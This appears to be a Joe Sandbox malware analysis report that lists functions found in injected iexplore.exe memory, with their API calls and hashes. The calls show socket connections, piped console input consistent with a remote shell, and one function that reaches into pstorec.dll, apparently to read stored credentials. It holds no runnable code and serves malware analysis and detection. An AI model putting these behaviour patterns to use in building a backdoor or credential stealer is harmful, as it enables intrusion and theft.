      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: e298893edad3138669fc941745400671b76b682ad310a8beb094197ea774632a
      • Instruction ID: a73c181a8863a0ce01a4ee2f916e449f53dd9e4aa0fc0bf1a2e733555c54b456
      • Opcode Fuzzy Hash: e298893edad3138669fc941745400671b76b682ad310a8beb094197ea774632a
      • Instruction Fuzzy Hash: 31125E35A012689FDF21DF28CC84BE9B7B4FF0A355F0441DAE41AA6951D778AE80CF52
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B53512 Relevance: 18.2, APIs: 12, Instructions: 161networkCOMMON
      Download Yara Rule
      APIs
      • select.WS2_32(?,?,?,00000000,0000012C), ref: 04B5359C
      • __WSAFDIsSet.WS2_32(?,?), ref: 04B535B7
      • RtlEnterCriticalSection.NTDLL(04B9CAA4), ref: 04B535C9
      • RtlLeaveCriticalSection.NTDLL(04B9CAA4), ref: 04B5362E
      • send.WS2_32(?,?,?,00000000), ref: 04B5364B
      • __WSAFDIsSet.WS2_32(?,?), ref: 04B53670
      • recv.WS2_32(?,?,00005000,00000000), ref: 04B53687
      • WSAGetLastError.WS2_32(?,?,00005000,00000000,?,?,00000000,?,?), ref: 04B5369A
        • Part of subcall function 04B4CDB5: RtlEnterCriticalSection.NTDLL(00000078), ref: 04B4CDF4
        • Part of subcall function 04B4CDB5: RtlLeaveCriticalSection.NTDLL(00000078), ref: 04B4CE06
      • RtlLeaveCriticalSection.NTDLL(04B9CAA4), ref: 04B5371C
      • closesocket.WS2_32 ref: 04B53728
      • RtlEnterCriticalSection.NTDLL(04B9CAA4), ref: 04B53734
      • RtlLeaveCriticalSection.NTDLL(04B9CAA4), ref: 04B53745
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$Leave$Enter$ErrorLastclosesocketrecvselectsend
      • String ID:
      • API String ID: 1051765158-0
      • Opcode ID: d16fc7e532043d87e8ee8cf621341dadb2e6be71ac5c18a8ec72c7d318082979
      • Instruction ID: 39740492331024f6be061f5a241d8de69ca01b0b30068d14f7f68ac4b6b79285
      • Opcode Fuzzy Hash: d16fc7e532043d87e8ee8cf621341dadb2e6be71ac5c18a8ec72c7d318082979
      • Instruction Fuzzy Hash: 9E514271D016189BDB20EBA8DC44EDEB7B8EF85345F0001E6E909E3660E7356E85CF61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B4FF9A Relevance: 18.1, APIs: 12, Instructions: 93filesynchronizationpipeCOMMON
      Download Yara Rule
      APIs
      • ReadFile.KERNEL32(?,?,00000024,?,?), ref: 04B4FFD9
      • GetLastError.KERNEL32 ref: 04B4FFE3
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04B50005
      • ResetEvent.KERNEL32(?), ref: 04B50015
      • GetTickCount.KERNEL32 ref: 04B50036
      • GetTickCount.KERNEL32 ref: 04B5004A
      • GenerateConsoleCtrlEvent.KERNEL32(00000000,00000000), ref: 04B5005B
      • GetStdHandle.KERNEL32(000000F6,?,00000001,?), ref: 04B5006F
      • WriteConsoleInputW.KERNEL32(00000000), ref: 04B50076
      • ResetEvent.KERNEL32(?), ref: 04B50084
      • SetEvent.KERNEL32(?), ref: 04B50097
      • DisconnectNamedPipe.KERNEL32(?), ref: 04B500A3
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Event$ConsoleCountResetTick$CtrlDisconnectErrorFileGenerateHandleInputLastNamedObjectPipeReadSingleWaitWrite
      • String ID:
      • API String ID: 1452265146-0
      • Opcode ID: ea80306f09d2e7a0e83ec47904309e3372d8c4180859703ca0ba1a1f94fd863e
      • Instruction ID: 75fb3f59ff23baf7083502ba59f03b6535766e09bc6047e462749697f15e08c8
      • Opcode Fuzzy Hash: ea80306f09d2e7a0e83ec47904309e3372d8c4180859703ca0ba1a1f94fd863e
      • Instruction Fuzzy Hash: DB313E71904108EFDB20EFB9D948EAEF7B8EF45315B080567E91AD6260DB78BC409B61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0300EEB9 Relevance: 16.8, APIs: 11, Instructions: 301COMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: _memset$__wfsopen_fgetws
      • String ID:
      • API String ID: 857616032-0
      • Opcode ID: e49d8022fa705720970f30762d4ff37bf65fbeff7b9347eb30a424e15d4e7880
      • Instruction ID: a9209cee2b3e9383ab8a217bf5614117e9678b26ed04a9bdd420ef4c0b1fd75a
      • Opcode Fuzzy Hash: e49d8022fa705720970f30762d4ff37bf65fbeff7b9347eb30a424e15d4e7880
      • Instruction Fuzzy Hash: 4AA18375901219AEEB61DBA4CC45EDBB3FCEF45350F4444A6E948DB180EB31AA94CBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B5375A Relevance: 16.6, APIs: 11, Instructions: 95networksleepsynchronizationCOMMON
      Download Yara Rule
      APIs
      • socket.WS2_32(00000002,00000001,00000000), ref: 04B53776
      • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 04B537BA
      • setsockopt.WS2_32(?,0000FFFF,00001006,00002710,00000004), ref: 04B537CF
      • closesocket.WS2_32 ref: 04B537D9
      • Sleep.KERNEL32(00000064), ref: 04B537E1
      • htons.WS2_32(?), ref: 04B537FA
      • inet_addr.WS2_32(?), ref: 04B53803
      • connect.WS2_32(?,?,00000010), ref: 04B53811
      • CreateThread.KERNEL32(00000000,00000000,Function_00013512,?,00000000,?), ref: 04B5382D
      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04B5383F
      • socket.WS2_32(00000002,00000001,00000000), ref: 04B5384A
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: setsockoptsocket$CreateObjectSingleSleepThreadWaitclosesocketconnecthtonsinet_addr
      • String ID:
      • API String ID: 3072795916-0
      • Opcode ID: b57da6e6412aed1453afedb33d96845e5ed90a354fb07666e92561a3ead10994
      • Instruction ID: d90406f502185e7d12eaf43d091f9379b9ace2d0450fa7298176fd761fba655a
      • Opcode Fuzzy Hash: b57da6e6412aed1453afedb33d96845e5ed90a354fb07666e92561a3ead10994
      • Instruction Fuzzy Hash: CF314F71A00209BFEB10DFA9DC4AFAEBBB8EF48710F100166FA11E76E0D67459449B71
      Uniqueness

      Uniqueness Score: -1.00%

      Function 030099B4 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 499COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID: <
      • API String ID: 0-4251816714
      • Opcode ID: a4cd2bc90e788a9b630e6bf4f6f65b27e52c98499bfff1fcd51af088478625d8
      • Instruction ID: 497faecd5d1645404d69b427223bf4c2c29da2bd2abc6bfd6a5843150ac5102e
      • Opcode Fuzzy Hash: a4cd2bc90e788a9b630e6bf4f6f65b27e52c98499bfff1fcd51af088478625d8
      • Instruction Fuzzy Hash: 670295B19012589FEB21DB60CD84FEAB7BDEF45304F0448A9E14AB7191DBB19E84CF51
      Uniqueness

      Uniqueness Score: -1.00%

      Function 03010AFB Relevance: 15.3, APIs: 10, Instructions: 277COMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: _memset
      • String ID:
      • API String ID: 2102423945-0
      • Opcode ID: 3f75da51cdd9bbe95de4315788ed81d3cbc4f575dfd9279629cde29537c007a5
      • Instruction ID: d9619a11e100e4adc1c881772ba4fe403c641da9a395cba64bdaa0d9a735bcf5
      • Opcode Fuzzy Hash: 3f75da51cdd9bbe95de4315788ed81d3cbc4f575dfd9279629cde29537c007a5
      • Instruction Fuzzy Hash: 15B14AB59022299BCF20DB69DD84DEEB2FDAB48704F4445F6F649E7060D6309BD18FA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B571A9 Relevance: 15.2, APIs: 10, Instructions: 250networkCOMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: htonsrecvfromsendto
      • String ID:
      • API String ID: 2952609444-0
      • Opcode ID: 37910c448db58479c9c695a2f9ea8ca3ae605a5df17670e654e92c5b74de3abf
      • Instruction ID: 833925c16fc46910008eeb521ed9e4b3936bf8de092f94b38df8c7235c3456b7
      • Opcode Fuzzy Hash: 37910c448db58479c9c695a2f9ea8ca3ae605a5df17670e654e92c5b74de3abf
      • Instruction Fuzzy Hash: 36B163719003699ADB35DB68CC58AEABBB9FF44304F0005EAE58DE3252D6746EC4CF20
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B50808 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 102filesynchronizationpipeCOMMON
      Download Yara Rule
      APIs
      • ReadFile.KERNEL32(?,?,00007D32,?,?), ref: 04B50863
      • GetLastError.KERNEL32 ref: 04B5086D
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04B50884
      • ResetEvent.KERNEL32(?), ref: 04B50891
      • ResetEvent.KERNEL32(?), ref: 04B5089C
      • SetEvent.KERNEL32(?), ref: 04B508AF
      • DisconnectNamedPipe.KERNEL32(?), ref: 04B508B8
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Event$Reset$DisconnectErrorFileLastNamedObjectPipeReadSingleWait
      • String ID: "}
      • API String ID: 1515994312-3370080606
      • Opcode ID: 06c4b8dc8eafd1aff7a64b6862e01fdbc5f41cf8c8571523b09b95fe804db18c
      • Instruction ID: 28a8a311c256262aab06620a0d9f4710ad7fd38507f5a0dd409c8e1e743b07ff
      • Opcode Fuzzy Hash: 06c4b8dc8eafd1aff7a64b6862e01fdbc5f41cf8c8571523b09b95fe804db18c
      • Instruction Fuzzy Hash: 93318371D082149BEB20AF69DC44ABDB7B8EF44704F0045E7E91ED61A0EB34BE45DE60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 03018352 Relevance: 13.6, APIs: 9, Instructions: 139COMMONLIBRARYCODE
      Download Yara Rule
      APIs
      • ____lc_handle_func.LIBCMT ref: 03018386
      • ____lc_codepage_func.LIBCMT ref: 0301838E
      • __GetLocaleForCP.LIBCPMT ref: 030183B6
      • ____mb_cur_max_l_func.LIBCMT ref: 030183CC
      • ____mb_cur_max_l_func.LIBCMT ref: 030183F9
      • ___pctype_func.LIBCMT ref: 0301841E
      • ____mb_cur_max_l_func.LIBCMT ref: 03018444
      • ____mb_cur_max_l_func.LIBCMT ref: 0301845C
      • ____mb_cur_max_l_func.LIBCMT ref: 03018474
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ____mb_cur_max_l_func$Locale____lc_codepage_func____lc_handle_func___pctype_func
      • String ID:
      • API String ID: 1487047833-0
      • Opcode ID: 1ce2620ba3af472b35559b788683815c83fa717012711414309c873a02583322
      • Instruction ID: cf7b61044d209134b4158a82a64733d6cd43f6653c67da0adb451e40d9c72dea
      • Opcode Fuzzy Hash: 1ce2620ba3af472b35559b788683815c83fa717012711414309c873a02583322
      • Instruction Fuzzy Hash: F141B171106351EFEB21DF30C880BBA7BE9AF41250F1CC469F959CA091EB70C6B0EA58
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B4FF10 Relevance: 13.6, APIs: 9, Instructions: 56threadCOMMON
      Download Yara Rule
      APIs
      • TerminateThread.KERNEL32(?,00000000,00000000,?,04B5024A,04B4D20B,?,?,?,?,?,?,00000000,00000000,?,?), ref: 04B4FF27
      • TerminateThread.KERNEL32(?,00000000,00000000,?,04B5024A,04B4D20B,?,?,?,?,?,?,00000000,00000000,?,?), ref: 04B4FF36
      • CloseHandle.KERNEL32(?,00000000,?,04B5024A,04B4D20B,?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 04B4FF46
      • CloseHandle.KERNEL32(?,00000000,?,04B5024A,04B4D20B,?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 04B4FF4F
      • CloseHandle.KERNEL32(?,00000000,?,04B5024A,04B4D20B,?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 04B4FF5C
      • CloseHandle.KERNEL32(?,00000000,?,04B5024A,04B4D20B,?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 04B4FF69
      • TerminateProcess.KERNEL32(?,00000000,00000000,?,04B5024A,04B4D20B,?,?,?,?,?,?,00000000,00000000,?,?), ref: 04B4FF75
      • CloseHandle.KERNEL32(?,00000000,?,04B5024A,04B4D20B,?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 04B4FF86
      • FreeConsole.KERNEL32(04B5024A,04B4D20B,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 04B4FF90
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandle$Terminate$Thread$ConsoleFreeProcess
      • String ID:
      • API String ID: 3759374865-0
      • Opcode ID: bd1027825ddabc6e7a8578c0121214bd9221e984de3db262ab01626fced7f400
      • Instruction ID: e6928e0b122a9561d803858f51058d67861a13b3270c71dcbdb83ff8e4687c41
      • Opcode Fuzzy Hash: bd1027825ddabc6e7a8578c0121214bd9221e984de3db262ab01626fced7f400
      • Instruction Fuzzy Hash: 22014830B05301ABDB30EA7A9C44F67B3ECEF91B51F15086AE549D3280DA68F800DA30
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B4C529 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 35libraryloaderCOMMON
      Download Yara Rule
      APIs
      • LoadLibraryW.KERNEL32(Kernel32.dll,?,04B4C61C,?,04B4CEB3), ref: 04B4C536
      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 04B4C553
      • GetProcAddress.KERNEL32(?,Wow64RevertWow64FsRedirection), ref: 04B4C55F
      • FreeLibrary.KERNEL32(?), ref: 04B4C571
      Strings
      • Wow64DisableWow64FsRedirection, xrefs: 04B4C54D
      • Wow64RevertWow64FsRedirection, xrefs: 04B4C555
      • Kernel32.dll, xrefs: 04B4C531
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: AddressLibraryProc$FreeLoad
      • String ID: Kernel32.dll$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection
      • API String ID: 2256533930-1575494070
      • Opcode ID: fd0204de9ff2395ad085e1e5f3968c5f21afddb44f0dc65d09c0cd285db81c8d
      • Instruction ID: d7c0bdd59d534d0f2cd4290b311af92cfb1ef349228f08861221b2dee4376546
      • Opcode Fuzzy Hash: fd0204de9ff2395ad085e1e5f3968c5f21afddb44f0dc65d09c0cd285db81c8d
      • Instruction Fuzzy Hash: 00F054315153129FD720AF7CEC067677EF4EB84A15F11486EE0D5D2210E775A4809F60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0300C174 Relevance: 10.7, APIs: 7, Instructions: 229COMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: _com_issue_errorex$__fassign_free_malloc_strrchr
      • String ID:
      • API String ID: 1535473290-0
      • Opcode ID: 9f14b7e8f100f4f15e568078733c77d5178d4ce7c2e247d49943b798443daed2
      • Instruction ID: 40274cf99a90510c2e28348deb1d8fe1e4127c46f848e3c7c18318d04f79f5ab
      • Opcode Fuzzy Hash: 9f14b7e8f100f4f15e568078733c77d5178d4ce7c2e247d49943b798443daed2
      • Instruction Fuzzy Hash: B4711BB1901249AFEF15DFE8CCC4DEEBBB9AF89204F148569F106EB150D771A905CB60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B56058 Relevance: 10.6, APIs: 7, Instructions: 126networksleepCOMMON
      Download Yara Rule
      APIs
      • socket.WS2_32(00000002,00000001,00000000), ref: 04B5607F
      • closesocket.WS2_32(00000000), ref: 04B560A6
      • send.WS2_32(00000000,00000000,0000000C,00000000), ref: 04B560D1
      • recv.WS2_32(?,-0000004C,0000004C,00000000), ref: 04B560F5
      • Sleep.KERNEL32(00000001,?,?,?,?,?,04B5588A), ref: 04B56104
      • Sleep.KERNEL32(0000004D), ref: 04B56174
      • closesocket.WS2_32(?), ref: 04B5618F
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Sleepclosesocket$recvsendsocket
      • String ID:
      • API String ID: 210098885-0
      • Opcode ID: 392029b7221fddffefb295defe01fd730c2f0eece7c65288de70ebd1ad4cd973
      • Instruction ID: 3b48a33dd8f2b954e81aea87737d68c2857aa1ccd30ace316c88e5e568be36d2
      • Opcode Fuzzy Hash: 392029b7221fddffefb295defe01fd730c2f0eece7c65288de70ebd1ad4cd973
      • Instruction Fuzzy Hash: 64418071A00219AFDB10AF68DC45FAEBBB8FF44714F40019AF919DB2A1D774E951CBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B43DEB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93COMMON
      Download Yara Rule
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Maklocchr
      • String ID: false$true
      • API String ID: 1214102354-2658103896
      • Opcode ID: ff0e39d06e6a6c216b4d7621fee42e56817d1e903a8bf13a2ddcaf81f2680f4c
      • Instruction ID: 6896dcec8e89085780434a58f21dac14168e487b20275653b5ed68a8fd068e7f
      • Opcode Fuzzy Hash: ff0e39d06e6a6c216b4d7621fee42e56817d1e903a8bf13a2ddcaf81f2680f4c
      • Instruction Fuzzy Hash: 333112F1D04749AEEB10EFF9C4805DEFBF9EF48214F04945AD865A7211D630AA009F75
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B5BF11 Relevance: 9.2, APIs: 6, Instructions: 190COMMONLIBRARYCODE
      Download Yara Rule
      APIs
      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,0000009C,00000100,?,?,?,?,00000001,00000001,00000001,00000001), ref: 04B5BF82
      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 04B5BFF0
      • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 04B5C00C
      • LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 04B5C045
      • LCMapStringW.KERNEL32(?,?,?,?,00000000,?), ref: 04B5C0AB
      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 04B5C0CA
        • Part of subcall function 04B593FA: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 04B5943F
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ByteCharMultiStringWide$AllocateHeap
      • String ID:
      • API String ID: 1400492145-0
      • Opcode ID: c48b5896c3e5160e494a4bca26325e9be36fcfd6138933953e9baf29eeba1e65
      • Instruction ID: 19d80a534aa13647556e979250383d2a06c9c7a8497a7545f80d47a4b343215c
      • Opcode Fuzzy Hash: c48b5896c3e5160e494a4bca26325e9be36fcfd6138933953e9baf29eeba1e65
      • Instruction Fuzzy Hash: 4551AF72900249EFEF119FA4CC80AAEBFB6EB88354F1841A9F915E7170D731E8619F50
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0301D267 Relevance: 9.2, APIs: 6, Instructions: 168COMMONLIBRARYCODE
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: __setlocale_get_all_strcspn_strlen_strpbrk
      • String ID:
      • API String ID: 2761703447-0
      • Opcode ID: 49771684933d372b7cc1cc6b8bc31340e38024c9c413519fedf5d801805f07d2
      • Instruction ID: b35ac928e4a391234eb27dc9dc9346057de85a9a10cf9fe0fde19f0dc3f8cc49
      • Opcode Fuzzy Hash: 49771684933d372b7cc1cc6b8bc31340e38024c9c413519fedf5d801805f07d2
      • Instruction Fuzzy Hash: BB51E1B1D023699FEF71DB348C80BB9F7F8EB41254F1840EAD549AB142DB349AA4CB11
      Uniqueness

      Uniqueness Score: -1.00%

      Function 03006C44 Relevance: 9.2, APIs: 6, Instructions: 164COMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: _memset$Exception@8H_prolog3_catchThrow
      • String ID:
      • API String ID: 3180429071-0
      • Opcode ID: e1b7375029ffa27449bb13240a7358891684e4032724d410d624592fb264397c
      • Instruction ID: 4bcfecc49620e4d077ce1da22574c290e9b29bd795cf5866e949113d2a37d025
      • Opcode Fuzzy Hash: e1b7375029ffa27449bb13240a7358891684e4032724d410d624592fb264397c
      • Instruction Fuzzy Hash: 84613D70901B499FE760DF74C888BEBB7F9EF44300F04492DE56AAA190D771AA54CB61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B500ED Relevance: 9.1, APIs: 6, Instructions: 79filesynchronizationpipeCOMMON
      Download Yara Rule
      APIs
      • WriteFile.KERNEL32(?,?,00007D32,?,?), ref: 04B501A0
      • ResetEvent.KERNEL32(?), ref: 04B501B0
      • GetLastError.KERNEL32 ref: 04B501CA
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04B501E4
      • SetEvent.KERNEL32(?), ref: 04B501FA
      • DisconnectNamedPipe.KERNEL32(?), ref: 04B50206
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Event$DisconnectErrorFileLastNamedObjectPipeResetSingleWaitWrite
      • String ID:
      • API String ID: 3952501043-0
      • Opcode ID: 254ed7b3deff4bd984a7343e3a1750c3ac0f82762b2ac63c57de9be6a1e9db0c
      • Instruction ID: f3f1db5e63d9913eece71cf299d636d4ff169f2fedf97e91d8949d61290e1943
      • Opcode Fuzzy Hash: 254ed7b3deff4bd984a7343e3a1750c3ac0f82762b2ac63c57de9be6a1e9db0c
      • Instruction Fuzzy Hash: CF311A71D082189BDB20AF69DC809AAF7B9FF48314F5044EBE50ED6660D738BE509F61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0300685B Relevance: 9.1, APIs: 6, Instructions: 65COMMON
      Download Yara Rule
      APIs
      • __time64.LIBCMT ref: 03006864
        • Part of subcall function 03019C74: __aulldiv.LIBCMT ref: 03019C9F
        • Part of subcall function 03019522: __getptd.LIBCMT ref: 03019527
      • _malloc.LIBCMT ref: 03006873
        • Part of subcall function 0301948E: __FF_MSGBANNER.LIBCMT ref: 030194A7
        • Part of subcall function 0301948E: __NMSG_WRITE.LIBCMT ref: 030194AE
      • _rand.LIBCMT ref: 0300688C
      • _rand.LIBCMT ref: 030068A2
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: _rand$__aulldiv__getptd__time64_malloc
      • String ID:
      • API String ID: 1398773224-0
      • Opcode ID: a9b5b06c46db41426e274ab7c31bf76b9b5e1564b261450b39875dbf118bedbb
      • Instruction ID: 214ba632499a1b7324ec620d5db906c9d58985376ecb1ac06909f66c11bead81
      • Opcode Fuzzy Hash: a9b5b06c46db41426e274ab7c31bf76b9b5e1564b261450b39875dbf118bedbb
      • Instruction Fuzzy Hash: 4D01683B38730817F314F96668D2BDAB78FD7C17A0F04021AE1015E0C4CA6B8A6643B2
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B5077F Relevance: 9.0, APIs: 6, Instructions: 48filesynchronizationpipeCOMMON
      Download Yara Rule
      APIs
      • WriteFile.KERNEL32(?,?,00000024,?,?), ref: 04B507AD
      • ResetEvent.KERNEL32(?), ref: 04B507BA
      • GetLastError.KERNEL32 ref: 04B507C5
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04B507DC
      • SetEvent.KERNEL32(?), ref: 04B507EC
      • DisconnectNamedPipe.KERNEL32(?), ref: 04B507F5
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Event$DisconnectErrorFileLastNamedObjectPipeResetSingleWaitWrite
      • String ID:
      • API String ID: 3952501043-0
      • Opcode ID: 36839b3dd215b76d0fec79dc54d0b62f2ed763b7f1fcc62bbb82cb0f7759a051
      • Instruction ID: 2bcdaad6310b257d90c1f2f42ba932dbab3bd35d2c2272d1f3262e645d6ab805
      • Opcode Fuzzy Hash: 36839b3dd215b76d0fec79dc54d0b62f2ed763b7f1fcc62bbb82cb0f7759a051
      • Instruction Fuzzy Hash: 5A01C031800204EFCB20AF69DC4899EFBF8EF44310B10866BE856D2570D730AA50CF71
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B4C0E0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229libraryloaderCOMMON
      Download Yara Rule
      APIs
      • LoadLibraryA.KERNEL32(pstorec.dll), ref: 04B4C10D
      • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 04B4C119
      • StrStrIA.SHLWAPI(00000000,?), ref: 04B4C273
        • Part of subcall function 04B70110: GetErrorInfo.OLEAUT32(00000000,00000000,?,?,04B4B839,00000000,?,04B71C90,?,?,?,?), ref: 04B70160
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: AddressErrorInfoLibraryLoadProc
      • String ID: PStoreCreateInstance$pstorec.dll
      • API String ID: 1186719886-2881415372
      • Opcode ID: 2b6a53dcfdf64a29c1f89e3ba979a8d2d1cf0d304e03228359535c885ad2bf1e
      • Instruction ID: 40b43fa5f710a887e88b17420c219ac6591e3cc6d8d36f38952b177ae364e9a5
      • Opcode Fuzzy Hash: 2b6a53dcfdf64a29c1f89e3ba979a8d2d1cf0d304e03228359535c885ad2bf1e
